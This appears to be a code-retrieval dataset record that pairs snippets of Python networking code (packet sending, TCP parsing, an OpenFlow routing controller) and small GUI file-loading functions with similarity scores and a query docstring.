"def do_send_list( self, a_list ):\r\n # --- this needs to be moved to task some set up here then on there\r\n self.logger.info( \"turn on sendList\" )\r\n self.send_list_ix = 0\r\n\r\n #self.send_list = [ 180, 920, 160, 1740, 160, 780, 160, 2840, 160, 1320, 160, 1340, 160, ] # 1180, 160, 2700, 160, 12780, 200, 920, \\\r\n #160, 2680, 160, 780, 160, 800, 160, 780, 160, 920, 160, 800, 140, 800, \\\r\n # 160 ]\r\n self.send_list = a_list\r\n self.com_driver.send( \"z\\n\" )\r\n self.list_send = True # if we were mult-threaded this would have to be here\r\n\r\n return",
"def write_to_pipe(self, event_list):\n self.pipe.send_bytes(b''.join(event_list))",
"def send_pkt(self, pkt_tuple):\r\n pkt_str = str(pkt_tuple[0])\r\n tuser = pkt_tuple[1]\r\n while len(pkt_str) > self.bus_width:\r\n # at least one more word of this packet after this one\r\n tdata = pkt_str[0:self.bus_width]\r\n tvalid = 1\r\n tkeep = (1<<self.bus_width)-1\r\n tlast = 0\r\n msg = AXI_S_message(tdata, tvalid, tkeep, tlast, tuser)\r\n self.out_pipe.put(msg)\r\n yield self.wait_sys_clks(1)\r\n pkt_str = pkt_str[self.bus_width:]\r\n # this is the last word of the packet\r\n tdata = pkt_str + '\\x00'*(self.bus_width - len(pkt_str))\r\n tvalid = 1\r\n tkeep = (1<<len(pkt_str))-1\r\n tlast = 0\r\n msg = AXI_S_message(tdata, tvalid, tkeep, tlast, tuser)\r\n self.out_pipe.put(msg)",
"def send_pkts(self):\n pkts = self.__create_packets()\n sendpfast(pkts, pps=self.pps, iface=self.iface)",
"def send_packets (self):\n for lindex in self.enabled_lindex:\n self.send_packets_lindex(lindex)",
"def apply(self, pkt_list):\n pkt_list.display()\n\n return pkt_list",
"def SendPacketsElements(self) -> _n_0_t_7[SendPacketsElement]:",
"def forward(self, srcip, packet): #gets entire packet and srcip of that packet\n # get route to send packet\n best_route = self.get_route(srcip, packet[DEST]) #is a socket\n\n sock = best_route\n\n\n jsonpack = json.dumps(packet)\n sock.sendall(jsonpack.encode())\n # TODO fix src and dest\n return True",
"def parsePacket(pkt,SubList):\r\n #print the packet\r\n #pkt.displayPacket()\r\n #get the data type\r\n data_type = pkt.getDataType()\r\n #get the identifier\r\n identifier = pkt.getID()\r\n #check for subscribers internal and external\r\n sendList = []\r\n currentTime = time.time()\r\n for s in SubList:\r\n #check for the correct sub\r\n if s.TYPE == data_type:\r\n if s.ID == identifier:\r\n #Check the request rate\r\n if((currentTime - s.getLastTime()) >= s.getRequestTime()):\r\n s.setLastTime(currentTime) #update the last time it was sent\r\n sendList.append(s) #Add it to the list\r\n #Return send list\r\n return sendList",
"def _send(self, msg, adb_info):\n packed = msg.pack()\n _LOGGER.debug(\"bulk_write(%d): %r\", len(packed), packed)\n self._transport.bulk_write(packed, adb_info.transport_timeout_s)\n\n if msg.data:\n _LOGGER.debug(\"bulk_write(%d): %r\", len(msg.data), msg.data)\n self._transport.bulk_write(msg.data, adb_info.transport_timeout_s)",
"def create_stream(cls, packet_count=test_packet_count):\n for i in range(0, packet_count):\n info = cls.create_packet_info(cls.src_dst_if, cls.src_dst_if)\n payload = cls.info_to_payload(info)\n p = (\n Ether(dst=cls.src_dst_if.local_mac, src=cls.src_dst_if.remote_mac)\n / IP(\n id=info.index,\n src=cls.src_dst_if.remote_ip4,\n dst=cls.src_dst_if.local_ip4,\n )\n / ICMP(type=\"echo-request\", id=1234)\n / Raw(payload)\n )\n cls.extend_packet(p, 1518, cls.padding)\n info.data = p",
"def OnESPacket(current_pid, packet, header_size):\n pass",
"def send_packet(self, raw_packet):\n\n if self.verbose:\n print(\"< %s\" % \" \".join(\"%02x\" % i for i in raw_packet))\n\n # Send the data to the device.\n self.ftdi.write(self.ftdi.INTERFACE_A, raw_packet, async_=False)",
"def sendBuffer():\n dislin.sendbf()",
"def process(self, pkt):\n pass",
"def act_like_hub (self, packet, packet_in):\n # We want to output to all ports -- we do that using the special\n # OFPP_ALL port as the output port. (We could have also used\n # OFPP_FLOOD.)\n self.resend_packet(packet_in, of.OFPP_ALL)\n\n # Note that if we didn't get arp_req valid buffer_id, arp_req slightly better\n # implementation would check that we got the full data before\n # sending it (len(packet_in.data) should be == packet_in.total_len)).",
"def _send(self, frame):\n \n self.device.write(frame)",
"def start_streams(self, stream_list, get_result=False):\n for stream_id in stream_list:\n self.send_stream(stream_id, get_result=get_result)",
"def send_traffic_data(serialport, pack):\n pack[0] = 0x01\n pack[1] = 0x00\n serialport.write(pack)\n logging.debug(\"Traffic Data - Sent.\")\n logging.debug(str(pack))",
"def send_protobuf(stream_name_, plugin_id, pkg_list, stream_manager):\n protobuf = MxProtobufIn()\n protobuf.key = \"appsrc{}\".format(plugin_id).encode('utf-8')\n protobuf.type = b\"MxTools.MxpiTensorPackageList\"\n protobuf.protobuf = pkg_list.SerializeToString()\n protobuf_vec = InProtobufVector()\n protobuf_vec.push_back(protobuf)\n err_code = stream_manager.SendProtobuf(\n stream_name_, plugin_id, protobuf_vec)\n if err_code != 0:\n logging.error(\n \"Failed to send data to stream, stream_name(%s), plugin_id(%s), element_name(%s), \"\n \"err_code(%s).\", stream_name_, plugin_id,\n \"appsrc{}\".format(plugin_id).encode('utf-8'), err_code)\n return False\n return True",
"def on_iteration(self):\n for stream_id in list(self.send_streams.keys()):\n self.send_headers(stream_id)\n self.send_data(stream_id)",
"def _packet_in(self, ev):\n\n dp = ev.msg.datapath\n ofp = dp.ofproto\n parser = dp.ofproto_parser\n match = ev.msg.match\n\n ##SNDCP packet with multiple fragments recieved - print warning, send ICMP fragmentation needed\n ##TODO: Not WOrking correctly\n ## File \"/usr/local/lib/python2.7/dist-packages/ryu/ofproto/ofproto_v1_3_parser.py\", line 746, in __getitem__\n ## return dict(self._fields2)[key]\n ## KeyError: 'udp_dst'\n\n # if (match['eth_type'] == 0x0800 and match['ip_proto'] == inet.IPPROTO_UDP\n # and match['udp_dst'] == VGSN_PORT and match['sndcp_first_segment'] == 1\n # and match['sndcp_more_segments'] == 1):\n # _icmp_send(dp,match['in_port'],match['ipv4_dst'],match['ipv4_src'],match['eth_dst'],match['eth_src'],icmp_type=3,icmp_code=4)\n # LOG.warning('WARNING: Device with IP: '+match['ipv4_src']+' sent fragmented sndcp packet')\n # return\n\n ##ARP request recieved - send 'I'm here' response\n if match['eth_type'] == 0x0806 and match['arp_op'] == 1:\n LOG.debug(\"ARP request accepted\")\n _arp_send(dp=dp, port_out=match['in_port'], arp_code=2, eth_dst=match['eth_src'], eth_target=match['arp_sha'],\n ip_target=match['arp_spa'], ip_sender=match['arp_tpa'])\n LOG.debug('Reply to '+match['arp_spa'] +': Host '+match['arp_tpa']+' is at forwarder '+str(dp.id) + \" with ethX source MAC address\")\n return\n\n ##ARP response with target_ip==DISCOVERY_ARP_IP recieved - we found APN\n #\n # FIXED: All ARP responses are replied, regardless of the target IP\n #\n # TODO : At this point only ARPs belonging to the APNs networks subnet should\n # be answered\n if match['eth_type'] == 0x0806 and match['arp_op'] == 2:\n LOG.debug('TUNNEL MNGR: ARP response with target APN discovery IP recieved at controller, processing for APN extraction')\n pkt = packet.Packet(array.array('B', ev.msg.data))\n arp_pkt=pkt.get_protocol(arp.arp)\n apn_ip = arp_pkt.src_ip\n apn_mac= arp_pkt.src_mac\n port = match['in_port']\n\n ##Search for apn in APN_POOL to add mac addr. and update topology\n for sApn in APN_POOL:\n if sApn.ip_addr == apn_ip:\n LOG.debug('Recieved ARP response was from ' + sApn.name + ' APN')\n sApn.eth_addr = apn_mac\n sApn.port = port\n sApn.dpid = dp.id\n # Links towards APNs will not be measured\n topo.add_link(dp.id,str(sApn.name),port)\n topo.add_link(str(sApn.name),dp.id,0)\n topo.reload_topology()\n LOG.debug('TUNNEL MNGR: APN '+str(sApn.name)+' found at forwarder: '+str(dp.id)+', port: '+str(port) + ' by ARP search')\n\n ##Add special rules to edge forwarder\n self.on_edge_inet_dp_join(dp, port, sApn)\n\n # FIX: We do not handle bss as a special APN\n # For greater extensibility, BSS/UTRAN/LAN APNs (exit/enter) points\n # will be handled in a generic manner\n #\n ##Create MAC-tunnels between APN and all BSSs\n #for bss in BSS_POOL:\n # self.add_tunnel(bss,apn)\n #break\n\n ### WMNC: In this case, we are not making tunnels between\n # two types of ingress/egress point, but actually same type\n\n for dApn in APN_POOL:\n # we are cycling through all possible APNs, looking for different APN tupples\n # with filled HW addresses (already found by APN search)\n if sApn != dApn and dApn.eth_addr != None:\n LOG.debug('TUNNEL MNGR: Different APNs with filled HW address found, lets find out if there is tunnel between them')\n\n paths = False\n try:\n paths = nx.all_simple_paths(topo.DynamicGraph, source=sApn.name, target=dApn.name)\n except:\n LOG.debug('TUNNEL MNGR: No path between: ' + sApn.name + ' and ' + dApn.name + '. Retry when next APN discovered.')\n\n LOG.debug('TUNNEL MNGR: These are the paths between them (possible tunnels):')\n if paths:\n for path in paths:\n LOG.debug('TUNNEL MNGR: Calling add_plainMacTunnel for ' + sApn.name + ' and ' + dApn.name + ' with path: ' + str(path))\n self.add_plainMacTunnel(sApn, dApn, path)\n else:\n LOG.debug('TUNNEL MNGR: PATHS == 0 ????????????????')\n\n\n return\n\n ##ICMP echo with dst_ip==DISCOVERY_IP_DST recieved - new link between forwarders is up\n if match['eth_type'] == 0x0800 and match['ipv4_dst'] == DISCOVERY_IP_DST and match['ip_proto'] == 1:\n #LOG.debug('TOPO MNGR: ICMP echo recieved at controller, processing for link extraction or latency measurement')\n\n pkt = packet.Packet(array.array('B', ev.msg.data))\n\n ##Discovery pings carry information about sending datapath in payload of icmp packet\n ##these information are in Dictionary format, we parse the out with _icmp_parse_payload() method\n body = _icmp_parse_payload(pkt)\n neighbourDPID=body['dpid']\n neighbourPort=body['port_out']\n\n ## measurement\n ## currentClock moved way up to improve precision\n receivedClock=float(body['clock'])\n currentClock = time.clock()\n latency = currentClock - receivedClock\n\n currentDate = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n ##Update latency or add new edges to topology.\n if topo.DynamicGraph.has_edge(dp.id, neighbourDPID) and topo.DynamicGraph.has_edge(neighbourDPID, dp.id):\n topo.StaticGraph[neighbourDPID][dp.id]['pdv'] = topo.StaticGraph[neighbourDPID][dp.id]['lat'] - latency\n topo.StaticGraph[neighbourDPID][dp.id]['lat'] = latency\n topo.StaticGraph[neighbourDPID][dp.id]['upt'] = currentDate\n #topo.StaticGraph[neighbourDPID][dp.id]['upt'] = currentDate\n loss = self.loss_update(neighbourDPID, dp.id, currentDate)\n #LOG.debug('TOPO MNGR: Updating latency ' + str(latency) + ' and date ' + str(currentDate) + ' LOSS: ' + str(loss))\n topo.reload_topology()\n else:\n ## latency not correct for both directions when adding links\n ## update occurs on receive of next measurement packet from oposite direction\n topo.add_link(dp.id, neighbourDPID, ev.msg.match['in_port'], latency, currentDate)\n topo.add_link(neighbourDPID, dp.id, neighbourPort , latency, currentDate)\n LOG.debug('TOPO MNGR: Topology changed: New link between forwarder ID '+str(dp.id)+ ' via port ' + str(ev.msg.match['in_port'])\n +' and forwarder ID '+str(neighbourDPID)+ ' via port ' + str(neighbourPort) + ' was discovered.')\n\n topo.reload_topology()\n ## retry to create tunnels\n ## find better paths between APNs\n for sApn in APN_POOL:\n for dApn in APN_POOL:\n if sApn != dApn:\n LOG.debug('TOPO MNGR: Topology changed: trying to re-build inactive tunnel between:' + sApn.name + ' and ' + dApn.name)\n paths = False\n try:\n paths = nx.all_simple_paths(topo.DynamicGraph, source=sApn.name, target=dApn.name)\n except:\n LOG.debug('No path between: ' + sApn.name + ' and ' + dApn.name + '. Retry when next fwd connects.')\n\n LOG.debug('TUNNEL MNGR: These are the paths between them (possible tunnels):')\n if paths:\n for path in paths:\n LOG.debug('TUNNEL MNGR: Calling add_plainMacTunnel for ' + sApn.name + ' and ' + dApn.name + ' with path: ' + str(path))\n self.add_plainMacTunnel(sApn, dApn, path)\n else:\n LOG.debug('TUNNEL MNGR: PATHS == 0 ????????????????')\n return\n\n # flow of last resort (process for routing)\n if match['eth_type'] == 0x0800:\n # LOG.debug('*****************Flow of last resort matched(plain IP), process for routing********'\n # + ' match[ipv4_dst]: ' + str(match['ipv4_dst'] + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(match['ip_dscp'])))\n ## Not very proud of myself, but it will do the trick\n ## Turbo lumberjack routing logic\n ## TODO: Implement a longest prefix match routing\n\n candidates = []\n\n for source, destination, ip_dscp in routesList:\n if ((source == match['ipv4_dst'] and destination == match['ipv4_src']) or (source == match['ipv4_src'] and destination == match['ipv4_dst'])) and ip_dscp == match['ip_dscp']:\n # LOG.debug('ROUTING: route source: ' + str(source) + 'destination: ' + str(destination)\n # + ' match[ipv4_dst]: ' + str(match['ipv4_dst'])\n # + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(ip_dscp)\n # + ' already exists, aborting addition of new route')\n return\n\n for tunnel in TUNNELS:\n if (tunnel.sApn.ip_addr == match['ipv4_dst'] and tunnel.dApn.ip_addr == match['ipv4_src']) or (tunnel.sApn.ip_addr == match['ipv4_src'] and tunnel.dApn.ip_addr == match['ipv4_dst']):\n LOG.debug('ROUTING: Tunnel candidate found in list of tunnels. Adding tunnel path: ' + str(tunnel.po_edges) + ' to candidates.')\n candidates.append(tunnel)\n\n trafficClass = self.TC_selection(match['ip_dscp'])\n\n if len(candidates) == 0:\n LOG.debug('ROUTING: match[ipv4_dst]: ' + str(match['ipv4_dst'])\n + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(match['ip_dscp']))\n LOG.debug('ROUTING: ERROR, NO feasible tunnels for such route.')\n return\n\n LOG.debug('Looking for tunnels: DST_IP: ' + match['ipv4_dst'] + ' SRC_IP: ' + match['ipv4_src'] + ' DSCP: ' + str(match['ip_dscp']) + '(traffic class: ' + str(trafficClass) + ')' + ' Incoming from FWD: ' + str(dp.id))\n tunnel = self.tunnel_selection(trafficClass, candidates)\n LOG.debug('TE MNGR: Selected tunnel Path out: ' + str(tunnel.path_out_str) + ' meter_id: ' + str(tunnel.meter_id))\n\n dscp = match['ip_dscp']\n\n ## meter_id\n ## 2,4,6,8,10 = 500kbps, 1,3,5,7,9 = 1000kbps ...\n ## 0 = 100Gbps\n meter_id = tunnel.meter_id\n\n #\n # FIXME: incomplete set of rules installed on LAN Access forwarders\n # TODO : Philosophy of table IDs should be clarified, as now it total mess!!!\n # TODO : this should be done only once, from that moment, all user plane packets\n # should travelse only forwarder and should not be sent to controller\n\n\n\n #WAY OUT\n dp = dpset.get(tunnel.sApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_type=0x0800, ipv4_dst=tunnel.dApn.ip_addr, ip_dscp=dscp)\n actions = [parser.OFPActionSetField(eth_src=tunnel.tid_in), parser.OFPActionSetField(eth_dst=tunnel.tid_out)]\n inst = [parser.OFPInstructionGotoTable(MAC_TUNNEL_TABLE), parser.OFPInstructionMeter(meter_id), parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=100, match=match, instructions=inst, table_id=INGRESS_TABLE)\n dp.send_msg(req)\n\n LOG.debug('ROUTING: Installing flow ON WAY OUT to forwarderID: ' + str(dp.id) + ',Table: ' + str(INGRESS_TABLE) + ' DP ID: ' + str(tunnel.dApn.dpid) + ' Tunel dApn IP addr: ' + str(tunnel.dApn.ip_addr) + ' Tunnel ID: ' + str(tunnel.tid_out))\n\n dp = dpset.get(tunnel.dApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_dst=tunnel.tid_out)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.dApn.eth_addr), parser.OFPActionOutput(tunnel.path_out[-1].port_out)]\n inst = [parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=300, match=match, instructions=inst, table_id=ACCESS_ADAPTATION_TABLE_OUT)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY OUT to forwarderID: ' + str(dp.id) + ',Table: ' + str(ACCESS_ADAPTATION_TABLE_OUT) + ' DP ID: ' + str(tunnel.dApn.dpid)+ ' Tunel ID: ' + str(tunnel.tid_out)+ ' dApn ETH addr: ' + str(tunnel.dApn.eth_addr))\n\n #WAY IN\n dp = dpset.get(tunnel.dApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_type=0x0800, ipv4_dst=tunnel.sApn.ip_addr, ip_dscp=dscp)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.tid_in), parser.OFPActionSetField(eth_src=tunnel.tid_out)]\n inst = [parser.OFPInstructionGotoTable(MAC_TUNNEL_TABLE), parser.OFPInstructionMeter(meter_id), parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=100, match=match, instructions=inst, table_id = INGRESS_TABLE)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY IN to forwarderID: ' + str(dp.id) + ',Table: ' + str(INGRESS_TABLE) + ' DP ID: ' + str(tunnel.sApn.dpid) + ' Tunel dApn IP addr: ' + str(tunnel.sApn.ip_addr) + ' Tunnel ID: ' + str(tunnel.tid_in))\n\n\n dp = dpset.get(tunnel.sApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_dst=tunnel.tid_in)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.sApn.eth_addr), parser.OFPActionOutput(tunnel.path_in[-1].port_out)]\n inst = [parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=300, match=match, instructions=inst, table_id=ACCESS_ADAPTATION_TABLE_OUT)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY IN to forwarderID: ' + str(dp.id) + ',Table: ' + str(ACCESS_ADAPTATION_TABLE_OUT) + ' DP ID: ' + str(tunnel.sApn.dpid)+ ' Tunel ID: ' + str(tunnel.tid_in)+ ' sApn ETH addr: ' + str(tunnel.sApn.eth_addr))\n\n\n LOG.debug('ROUTING: Rules on access edge forwarders installed')\n LOG.debug('ROUTING: Adding route: DST_IP: ' + tunnel.dApn.ip_addr + ' SRC_IP: ' + tunnel.sApn.ip_addr + ' dscp: ' + str(dscp) + ' path out str: ' + tunnel.path_out_str )\n routesList.append( ( tunnel.sApn.ip_addr, tunnel.dApn.ip_addr, dscp) )\n\n parser = dp.ofproto_parser\n\n for dpid in LAN_TYPE_FORWARDERS:\n ## DUNNO why this rule with low priority still hits traffic which is also matched by rules with IP address matches\n ## Here I delete the rule, it is added on FWD when it connects to controoller\n LOG.debug('TOPO MNGR: Forwarder: ' + str(dpid) + ' is a LAN edge forwarder, deleting rules')\n dp = dpset.get(dpid)\n priority = 2\n match = parser.OFPMatch(eth_type=0x0800)\n actions = [parser.OFPActionOutput(ofp.OFPP_CONTROLLER)]\n self.mod_flow(dp, command=dp.ofproto.OFPFC_DELETE_STRICT,\n table_id=0, actions=actions,\n match=match, priority=priority)\n\n LOG.debug('TOPO MNGR: Forwarder: ' + str(dp.id) + ' is a LAN edge forwarder, installing rules again :)')\n match = parser.OFPMatch(eth_type=0x0800)\n actions = [parser.OFPActionOutput(ofp.OFPP_CONTROLLER)]\n self.add_flow(dp, 2, match, actions)",
"def write(self, ostream):\n tstream = utils.BytearrayStream()\n\n if self._unique_identifier:\n self._unique_identifier.write(tstream)\n\n self.length = tstream.length()\n super(GetAttributeListRequestPayload, self).write(ostream)\n ostream.write(tstream.buffer)",
"def SendPacket(self, endpoint_addr, data):\n _, _, pipe = self._ep_fds[endpoint_addr]\n pipe.send(data)",
"def apply(self, pkt_list):\n pkt_list.summary()\n\n return pkt_list",
"def process_pkts(self, pkts: list):\n pkt_count = 0\n for ts, buf in pkts:\n eth = dpkt.ethernet.Ethernet(buf)\n if not isinstance(eth.data, dpkt.ip.IP):\n continue\n ip = eth.data\n if ((inet_to_str(ip.src) == self.sip and inet_to_str(ip.dst) == self.dip) or\n (inet_to_str(ip.src) == self.dip and inet_to_str(ip.dst) == self.sip)):\n if isinstance(ip.data, dpkt.tcp.TCP):\n tcp = ip.data\n if ((tcp.sport == self.sp and tcp.dport == self.dp) or\n (tcp.dport == self.sp and tcp.sport == self.dp)):\n pkt_count += 1\n self._process(buf, ts, pkt_count)\n if self._c_state == self._s_state and self._c_state == TCPState.CLOSED:\n logger.info(\"Session finished.\")\n logger.info(\"Number of packets in the session id: {} is {}\".format(\n self.session_count, len(self.sessions[self.session_count])))\n self.__reset_state__()",
"def handle_tcp(pkt, packets, i, start_point):\r\n src_port = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n dest_port = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n sequence_num = int(pkt[start_point:start_point+8], 16)\r\n start_point += 8\r\n acknowledgment = int(pkt[start_point:start_point+8], 16)\r\n start_point += 8\r\n data_offset = int(pkt[start_point], 16) * 4\r\n start_point += 2\r\n flags = pkt[start_point:start_point+2]\r\n flags_str = \"\"\r\n for f in flags:\r\n flags_str += str(format(int(f), '04b'))\r\n start_point += 2\r\n window_size = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n checksum_value = pkt[start_point:start_point+4]\r\n start_point += 4\r\n urgent_pointer = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n options = int((2 * packets[i][0][0] - start_point)/2)\r\n\r\n packets[i][2].append(src_port)\r\n packets[i][2].append(dest_port)\r\n packets[i][2].append(sequence_num)\r\n packets[i][2].append(acknowledgment)\r\n packets[i][2].append(data_offset)\r\n packets[i][2].append(flags_str)\r\n packets[i][2].append(window_size)\r\n packets[i][2].append(checksum_value)\r\n packets[i][2].append(urgent_pointer)\r\n packets[i][2].append(options)\r\n return packets",
"def send_packet(sender, payload):\n sender.write(payload)",
"def packets_for_stream(fobj, offset):\n pcap = dpkt.pcap.Reader(fobj)\n pcapiter = iter(pcap)\n ts, raw = pcapiter.next()\n\n fobj.seek(offset)\n for p in next_connection_packets(pcapiter, linktype=pcap.datalink()):\n yield p"
] |
[
"0.5825835",
"0.5745238",
"0.5683483",
"0.558449",
"0.5557022",
"0.5464802",
"0.54528224",
"0.5446074",
"0.54343146",
"0.53621197",
"0.532868",
"0.5285138",
"0.52766114",
"0.5175844",
"0.5172803",
"0.513203",
"0.51317626",
"0.51258296",
"0.51237726",
"0.5120732",
"0.51201624",
"0.5116703",
"0.5108795",
"0.50927794",
"0.5087931",
"0.5085977",
"0.5075281",
"0.50277793",
"0.5023833",
"0.5015895"
] |
0.6792502
|
0
|
Returns a list of all expected replies to the question `self` represents.
|
def get_expected_replies(self):
# () -> ([{"intent-name": str}])
return [cfg.INFORM_INTENT_PREFIX+self.slot_description["name"]]
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def replies(self):\r\n return Replies(self)",
"def replies(self):\n keys = {}\n comments = self.comments.order('-score').fetch(1000)\n for comment in comments:\n keys[str(comment.key())] = comment\n comment.replies = []\n for comment in comments:\n parent_key = Comment.reply_to.get_value_for_datastore(comment)\n parent = keys.get(str(parent_key))\n if parent:\n parent.replies.append(comment)\n replies = [c for c in comments if not c.reply_to]\n prefetch_refprop(replies, Comment.author)\n return replies",
"def get_replies(self):\n url = \"https://api.imgur.com/3/comment/{0}/replies\".format(self.id)\n json = self._imgur._send_request(url)\n child_comments = json['children']\n return [Comment(com, self._imgur) for com in child_comments]",
"def answers_all(self):\n return self.answer_set.all()",
"def questions(self):\n return self._questions",
"def get_questions(self):\n for q in self._objects[\"Questions\"]:\n yield (q)\n\n return",
"def get_replies(self, new=True):\n url = (\"https://api.imgur.com/3/account/{0}/\"\n \"notifications/replies\".format(self.name))\n return self._imgur._send_request(url, needs_auth=True)",
"def correct_answers(self):\n return self.answer_set.filter(active=True, correct=True)",
"def answers(self):\n assert self._answer_count\n for ii in self._answer_count:\n yield ii",
"def get_answers(self):\r\n pass",
"def get_questions(self):\n\t\treturn handle_to_object(call_sdk_function('PrlSrv_GetQuestions', self.handle))",
"def get_answers(self):\n result = self.answers \n\n self.answers = []\n\n return result",
"def answers(self):\n from quiz.models import Answer\n qids = self.values_list('id', flat=True)\n return Answer.objects.filter(\n question__id__in=qids).select_related('question')",
"def get_questions(self):\n\t\treturn handle_to_object(call_sdk_function('PrlVm_GetQuestions', self.handle))",
"def __iter__(self):\n return self.questions.__iter__()",
"def get_questions(self):\n self.post_question()\n return self.client.get(\"api/v2/questions\", headers={\"Authorization\": \"{}\".format(self.token())}, data=json.dumps(self.question), content_type='application/json')",
"def get_answers(self):\r\n return self.answer_values",
"def all_responses(self):\n questions = []\n contexts = []\n all_responses = []\n for response in self.responses:\n if response.question.text not in questions:\n questions.append(response.question.text)\n if response.context.text not in contexts:\n contexts.append(response.context.text)\n for question in questions:\n for context in contexts:\n answers = most_common_response_by_question_and_context(\n self.responses,\n question,\n context,\n )\n response_by_question_and_context = {\n 'question': question,\n 'context': context,\n 'answers': answers\n }\n all_responses.append(response_by_question_and_context)\n\n return all_responses",
"def _add_quick_replies(self, qr):\n result = list()\n next_nodes = self.next_nodes.split(\",\")\n\n for idx, quick_reply in enumerate(qr):\n result.append({\n \"title\": quick_reply,\n 'payload': next_nodes[idx],\n 'content_type': \"text\"\n })\n\n return result",
"def get_all_questions(self):\n query = (\"SELECT * FROM tbl_questions;\")\n user_reqeusts = get_just_query(query)\n return user_reqeusts",
"def get_list_answers(self, obj):\n return []",
"def get_message_replies(self, mid):\n pass",
"def get_rel_elements(self):\n return self.merged_root.findall('OrgQuestion/Thread/RelQuestion')",
"def correct_answers(self):\n return self.tasks.filter(answer=F('question__solution')).count()",
"def evaluate_questions(self):\n for question in self.question_list:\n question.evaluate_question()",
"def get_question_answers(self):\r\n # dict of (id, correct_answer)\r\n answer_map = dict()\r\n for response in self.responders.keys():\r\n results = self.responder_answers[response]\r\n answer_map.update(results)\r\n\r\n # include solutions from <solution>...</solution> stanzas\r\n for entry in self.tree.xpath(\"//\" + \"|//\".join(solution_tags)):\r\n answer = etree.tostring(entry)\r\n if answer:\r\n answer_map[entry.get('id')] = contextualize_text(answer, self.context)\r\n\r\n log.debug('answer_map = %s', answer_map)\r\n return answer_map",
"def __debug_print_questions__(self):\n for k in sorted(self.questions.keys()):\n print(\"Question: %s\" %k)\n for a in self.questions[k].answers:\n print(\"\\t%s\" % a)",
"def create_reply_all(self):\n return MessageCreateReplyAllRequestBuilder(self.append_to_request_url(\"createReplyAll\"), self._client)",
"def extract_questions_from_text(self, text):\n questions = []\n\n for match in self.QUESTION_RE.finditer(text):\n match_dict = match.groupdict()\n\n answer_type = match_dict['answer_type']\n number1 = match_dict.pop('number1')\n\n if answer_type == 'O':\n if re.search('(?i)to ask the Deputy President', match_dict['intro']):\n match_dict['dp_number'] = number1\n elif re.search('(?i)to ask the President', match_dict['intro']):\n match_dict['president_number'] = number1\n else:\n match_dict['oral_number'] = number1\n elif answer_type == 'W':\n match_dict['written_number'] = number1\n\n match_dict['translated'] = bool(match_dict['translated'])\n match_dict['questionto'] = match_dict['questionto'].replace(':', '')\n match_dict['questionto'] = self.correct_minister_title(match_dict['questionto'])\n\n questions.append(match_dict)\n\n return questions",
"def iterate_by(self, iter_type: str,\n is_utterance_question: Callable[[str], bool]) -> Generator[Tuple[str, str, str], None, None]:\n i = -1\n for utterance in self.utterances.values():\n if utterance.reply_to is not None:\n root_text = self.utterances[utterance.reply_to].text\n if is_utterance_question(root_text):\n i += 1\n if iter_type == 'answers':\n pair_idx = utterance.reply_to + pair_delim + str(utterance.id)\n yield utterance.id, utterance.text, pair_idx\n continue\n question = self.utterances[utterance.reply_to]\n pair_idx = str(question.id) + pair_delim + str(utterance.id)\n yield question.id, question.text, pair_idx\n if iter_type == 'both':\n pair_idx = utterance.reply_to + pair_delim + str(utterance.id)\n yield utterance.id, utterance.text, pair_idx"
] |
[
"0.6508348",
"0.61938727",
"0.6090138",
"0.60633636",
"0.60112613",
"0.59839123",
"0.58777964",
"0.5870995",
"0.58363676",
"0.58160585",
"0.5789464",
"0.57393974",
"0.5715851",
"0.56585544",
"0.56292933",
"0.5616232",
"0.55927455",
"0.5582778",
"0.555033",
"0.5545911",
"0.554136",
"0.54683197",
"0.54306376",
"0.53699666",
"0.5332629",
"0.530675",
"0.52955776",
"0.52654743",
"0.5208469",
"0.52050096"
] |
0.6340167
|
1
|
Finds and adds the contents of a .txt file the user wants to add to this GUI's Markov Chain
|
def find_file(self):
selected_file = tk.filedialog.askopenfilename(initialdir='/', title='Select File',
filetypes=(('txt Files', '*.txt'), ('All Files', '*.*')))
self.markov_chain.add_file(selected_file)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def test_add_1(self):\n contents = testdata.get_words()\n d = testdata.create_dir()\n ts = {\n \"foo.txt\": [contents],\n }\n ds = d.add(ts)\n path = ds[0]\n self.assertTrue(os.path.isfile(path), \"{} does not exist\".format(path))\n self.assertEqual(contents, path.read_text())",
"def add_file(self, filename):\n f = open(filename, 'r', encoding='utf8', errors='ignore')\n text = f.read()\n f.close()\n self.add_string(text)",
"def text_reader(file_path,text_edit):\n\n parent.ui.textEdit_design_image.clear()\n path = os.getcwd()+'\\media\\docs' + file_path\n f = open(path,'r');\n for x in f:\n text_edit.insertPlainText(x)",
